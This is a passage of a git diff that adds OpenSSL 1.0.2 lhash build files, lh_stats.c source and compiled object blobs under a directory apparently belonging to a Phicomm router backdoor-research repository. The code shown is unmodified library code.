zOaC*12he8!^McF#F9|OFuLv&vuL&MNoBeMJF8%KaF8%KbF8%Kd9zdJ@`B|=BpQmX*
zBbWXg1(*Ii1(*Kqg3J8*nXmRA7JBJ_MsVqWUU2DuNpP9}6~U$dHNmC-O~IxA9l@pl
zJ;9~_eZi&wQu<uft-s*Xf1}{if2ZKmzg=*d{}I8Z|FGcF|BT?$|GePRpPxzV^Ls_;
zrT;a-r9Xd1#O1@MtVwubNrV-A^A3Nrq0n@Dc(34io#Zk}4fK(J6EY<@e3h&|d7Ks;
z^(8v5vx1}k%M{0`pZ#YjP6&?r)1>bd9Q~8DE_uOG&%aAg3Xbbjp?FGg)c+D*SZ;eb
z=Y`#PpTH$X^CQQ6$`mIANB`f_fKI_NpAyA+!BIa)`imaU^WeOA-^FEG=<WK$a~UkN
zf}{UJI?fpNbN&HtNGJ)xQNNM&{JR9}OQg>${eIHpJuMat(FgZ5mcYJ;{2;ZlN>ZEk
z&rsYdc$(T+4G50@pQ1P~_*!aXH7Pji6BJ(*9PgvJyg?1l2k+sqRP1|w{xgE3|4xeU
z3f@I+td^iL6!za0h9)L>k{DJA!O_2s`gRB|*Rxx2)OV7;SMU@utoZjr>_+`CLMUaS
zm;M#OQD3lXV{Qok1!7pu36A<#xlim*=^qG=`tzjUAh`7J7990IC4H~p(!V4)>VHmp
z{v8q1mHuxiJ>P#+1eg9Zf}{T}^1my%)Gtw=qd$^feohY&!%BZn|3ZB`gwIBy?-m^M
z`5X213eKNd?7Ap8>X*^^D+@03uLzF%)ug{6xcvOy6&&?zNIxt1THsvpc`_E1p?)3d
zR|_ul-yt~aUnYH0aG8Iv;HckC`T@aZ{uc#D{Snfa1(*I6!BKyd^fv^T`n!UozMu57
zg3J9GfCdY0FWO=@-fG`#JVr5JS6LqrKce(}oy;qqr1%xZ`8vbbRrc>C-4&&0--_ZT
zir-Rvl48EDvVWQQeWjnGn6Im>uMp>b#C)3g4q9*KGsN2!pC!)MRo2^$3Vrx{B^KtK
z$2r9ViZ3b7*ZnEQlN7(HcqhfT73ci;KAiK(la4nH^AhnD2t@vq#Q8eR`ZDpIO3!)o
z{SWIaq(7$g)5IqfpCQio)$B7%ysY$mJik^vM)3{B1B&k`o}ifTqcFr*lK4WpUNPt6
zT&;L7={G8#C!SQiL_DqdB=G^o%f!zpK1JNb3#UeknWIn_$HIDmTVvVbOuU$#D4Mwa
zd-wR!LczqxMlnG7ruZfZQDh0Upff%^+Lsxw=O*4aIx+%(aBt$d(PB0Ze>C<&p_u6#
zqPRad9?y@B=CfnPQ#3j|0FPhsKN&oN5`YJ83B1RaB}qYr*Mnl(K2_;c(85b>vP!~6
ziEdz%OTzd`sBkQW_8BhrJWHHT1ER3hfe`EY@!xFptdrLP_jvq{f}Weh?%F$z&#4JH
z<T^#;^>iircV|L%1hpA#D+%we^{e2*K;eCg>xbt^uiuw|VJ>Q#s&J0-0EsOD)m(K$
z!!>{JbD<)S|CmC-`EhPN|5t$F{0Vr;GPg90o|h2Xylz|<1e4Nd+<&4|9nactKw~ky
z)HXF6XnepzsyTngKY|A4qQ|$=_;YGu_4x0@Sl9YZ$HN%{T7O(WwB+%8@8y~sM^4A^
y9X?ky0K--A(&O>Ft4a|F{3iZ!TbUs`e_>Qxe~y<y!!>@EJ`g`+A=P}|82<};WGW~C

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/krb5/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile
new file mode 100644
index 0000000..82bddac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile
@@ -0,0 +1,88 @@
+#
+# OpenSSL/crypto/lhash/Makefile
+#
+
+DIR=	lhash
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=lhash.c lh_stats.c
+LIBOBJ=lhash.o lh_stats.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= lhash.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+lh_stats.o: ../../e_os.h ../../include/openssl/bio.h
+lh_stats.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+lh_stats.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+lh_stats.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+lh_stats.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+lh_stats.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+lh_stats.o: ../../include/openssl/symhacks.h ../cryptlib.h lh_stats.c
+lhash.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+lhash.o: ../../include/openssl/e_os2.h ../../include/openssl/lhash.h
+lhash.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+lhash.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+lhash.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h lhash.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile.bak
new file mode 100644
index 0000000..82bddac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile.bak
@@ -0,0 +1,88 @@
+#
+# OpenSSL/crypto/lhash/Makefile
+#
+
+DIR=	lhash
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=lhash.c lh_stats.c
+LIBOBJ=lhash.o lh_stats.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= lhash.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+lh_stats.o: ../../e_os.h ../../include/openssl/bio.h
+lh_stats.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+lh_stats.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+lh_stats.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+lh_stats.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+lh_stats.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+lh_stats.o: ../../include/openssl/symhacks.h ../cryptlib.h lh_stats.c
+lhash.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+lhash.o: ../../include/openssl/e_os2.h ../../include/openssl/lhash.h
+lhash.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+lhash.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+lhash.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h lhash.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile.save
new file mode 100644
index 0000000..82bddac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/Makefile.save
@@ -0,0 +1,88 @@
+#
+# OpenSSL/crypto/lhash/Makefile
+#
+
+DIR=	lhash
+TOP=	../..
+CC=	cc
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=lhash.c lh_stats.c
+LIBOBJ=lhash.o lh_stats.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= lhash.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+lh_stats.o: ../../e_os.h ../../include/openssl/bio.h
+lh_stats.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+lh_stats.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+lh_stats.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+lh_stats.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+lh_stats.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+lh_stats.o: ../../include/openssl/symhacks.h ../cryptlib.h lh_stats.c
+lhash.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+lhash.o: ../../include/openssl/e_os2.h ../../include/openssl/lhash.h
+lhash.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+lhash.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+lhash.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h lhash.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_stats.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_stats.c
new file mode 100644
index 0000000..0bfec23
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_stats.c
@@ -0,0 +1,246 @@
+/* crypto/lhash/lh_stats.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+/*
+ * If you wish to build this outside of SSLeay, remove the following lines
+ * and things should work as expected
+ */
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_BIO
+# include <openssl/bio.h>
+#endif
+#include <openssl/lhash.h>
+
+#ifdef OPENSSL_NO_BIO
+
+void lh_stats(LHASH *lh, FILE *out)
+{
+    fprintf(out, "num_items             = %lu\n", lh->num_items);
+    fprintf(out, "num_nodes             = %u\n", lh->num_nodes);
+    fprintf(out, "num_alloc_nodes       = %u\n", lh->num_alloc_nodes);
+    fprintf(out, "num_expands           = %lu\n", lh->num_expands);
+    fprintf(out, "num_expand_reallocs   = %lu\n", lh->num_expand_reallocs);
+    fprintf(out, "num_contracts         = %lu\n", lh->num_contracts);
+    fprintf(out, "num_contract_reallocs = %lu\n", lh->num_contract_reallocs);
+    fprintf(out, "num_hash_calls        = %lu\n", lh->num_hash_calls);
+    fprintf(out, "num_comp_calls        = %lu\n", lh->num_comp_calls);
+    fprintf(out, "num_insert            = %lu\n", lh->num_insert);
+    fprintf(out, "num_replace           = %lu\n", lh->num_replace);
+    fprintf(out, "num_delete            = %lu\n", lh->num_delete);
+    fprintf(out, "num_no_delete         = %lu\n", lh->num_no_delete);
+    fprintf(out, "num_retrieve          = %lu\n", lh->num_retrieve);
+    fprintf(out, "num_retrieve_miss     = %lu\n", lh->num_retrieve_miss);
+    fprintf(out, "num_hash_comps        = %lu\n", lh->num_hash_comps);
+# if 0
+    fprintf(out, "p                     = %u\n", lh->p);
+    fprintf(out, "pmax                  = %u\n", lh->pmax);
+    fprintf(out, "up_load               = %lu\n", lh->up_load);
+    fprintf(out, "down_load             = %lu\n", lh->down_load);
+# endif
+}
+
+void lh_node_stats(LHASH *lh, FILE *out)
+{
+    LHASH_NODE *n;
+    unsigned int i, num;
+
+    for (i = 0; i < lh->num_nodes; i++) {
+        for (n = lh->b[i], num = 0; n != NULL; n = n->next)
+            num++;
+        fprintf(out, "node %6u -> %3u\n", i, num);
+    }
+}
+
+void lh_node_usage_stats(LHASH *lh, FILE *out)
+{
+    LHASH_NODE *n;
+    unsigned long num;
+    unsigned int i;
+    unsigned long total = 0, n_used = 0;
+
+    for (i = 0; i < lh->num_nodes; i++) {
+        for (n = lh->b[i], num = 0; n != NULL; n = n->next)
+            num++;
+        if (num != 0) {
+            n_used++;
+            total += num;
+        }
+    }
+    fprintf(out, "%lu nodes used out of %u\n", n_used, lh->num_nodes);
+    fprintf(out, "%lu items\n", total);
+    if (n_used == 0)
+        return;
+    fprintf(out, "load %d.%02d  actual load %d.%02d\n",
+            (int)(total / lh->num_nodes),
+            (int)((total % lh->num_nodes) * 100 / lh->num_nodes),
+            (int)(total / n_used), (int)((total % n_used) * 100 / n_used));
+}
+
+#else
+
+# ifndef OPENSSL_NO_FP_API
+void lh_stats(const _LHASH *lh, FILE *fp)
+{
+    BIO *bp;
+
+    bp = BIO_new(BIO_s_file());
+    if (bp == NULL)
+        goto end;
+    BIO_set_fp(bp, fp, BIO_NOCLOSE);
+    lh_stats_bio(lh, bp);
+    BIO_free(bp);
+ end:;
+}
+
+void lh_node_stats(const _LHASH *lh, FILE *fp)
+{
+    BIO *bp;
+
+    bp = BIO_new(BIO_s_file());
+    if (bp == NULL)
+        goto end;
+    BIO_set_fp(bp, fp, BIO_NOCLOSE);
+    lh_node_stats_bio(lh, bp);
+    BIO_free(bp);
+ end:;
+}
+
+void lh_node_usage_stats(const _LHASH *lh, FILE *fp)
+{
+    BIO *bp;
+
+    bp = BIO_new(BIO_s_file());
+    if (bp == NULL)
+        goto end;
+    BIO_set_fp(bp, fp, BIO_NOCLOSE);
+    lh_node_usage_stats_bio(lh, bp);
+    BIO_free(bp);
+ end:;
+}
+
+# endif
+
+void lh_stats_bio(const _LHASH *lh, BIO *out)
+{
+    BIO_printf(out, "num_items             = %lu\n", lh->num_items);
+    BIO_printf(out, "num_nodes             = %u\n", lh->num_nodes);
+    BIO_printf(out, "num_alloc_nodes       = %u\n", lh->num_alloc_nodes);
+    BIO_printf(out, "num_expands           = %lu\n", lh->num_expands);
+    BIO_printf(out, "num_expand_reallocs   = %lu\n", lh->num_expand_reallocs);
+    BIO_printf(out, "num_contracts         = %lu\n", lh->num_contracts);
+    BIO_printf(out, "num_contract_reallocs = %lu\n",
+               lh->num_contract_reallocs);
+    BIO_printf(out, "num_hash_calls        = %lu\n", lh->num_hash_calls);
+    BIO_printf(out, "num_comp_calls        = %lu\n", lh->num_comp_calls);
+    BIO_printf(out, "num_insert            = %lu\n", lh->num_insert);
+    BIO_printf(out, "num_replace           = %lu\n", lh->num_replace);
+    BIO_printf(out, "num_delete            = %lu\n", lh->num_delete);
+    BIO_printf(out, "num_no_delete         = %lu\n", lh->num_no_delete);
+    BIO_printf(out, "num_retrieve          = %lu\n", lh->num_retrieve);
+    BIO_printf(out, "num_retrieve_miss     = %lu\n", lh->num_retrieve_miss);
+    BIO_printf(out, "num_hash_comps        = %lu\n", lh->num_hash_comps);
+# if 0
+    BIO_printf(out, "p                     = %u\n", lh->p);
+    BIO_printf(out, "pmax                  = %u\n", lh->pmax);
+    BIO_printf(out, "up_load               = %lu\n", lh->up_load);
+    BIO_printf(out, "down_load             = %lu\n", lh->down_load);
+# endif
+}
+
+void lh_node_stats_bio(const _LHASH *lh, BIO *out)
+{
+    LHASH_NODE *n;
+    unsigned int i, num;
+
+    for (i = 0; i < lh->num_nodes; i++) {
+        for (n = lh->b[i], num = 0; n != NULL; n = n->next)
+            num++;
+        BIO_printf(out, "node %6u -> %3u\n", i, num);
+    }
+}
+
+void lh_node_usage_stats_bio(const _LHASH *lh, BIO *out)
+{
+    LHASH_NODE *n;
+    unsigned long num;
+    unsigned int i;
+    unsigned long total = 0, n_used = 0;
+
+    for (i = 0; i < lh->num_nodes; i++) {
+        for (n = lh->b[i], num = 0; n != NULL; n = n->next)
+            num++;
+        if (num != 0) {
+            n_used++;
+            total += num;
+        }
+    }
+    BIO_printf(out, "%lu nodes used out of %u\n", n_used, lh->num_nodes);
+    BIO_printf(out, "%lu items\n", total);
+    if (n_used == 0)
+        return;
+    BIO_printf(out, "load %d.%02d  actual load %d.%02d\n",
+               (int)(total / lh->num_nodes),
+               (int)((total % lh->num_nodes) * 100 / lh->num_nodes),
+               (int)(total / n_used), (int)((total % n_used) * 100 / n_used));
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_stats.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_stats.o
new file mode 100644
index 0000000000000000000000000000000000000000..5f2f9bf13bebcfd9e2a31d48ccef73f93bb36c62
GIT binary patch
literal 5768
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_test.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_test.c
new file mode 100644
index 0000000..d9db83f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/lhash/lh_test.c
@@ -0,0 +1,88 @@
+/* crypto/lhash/lh_test.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
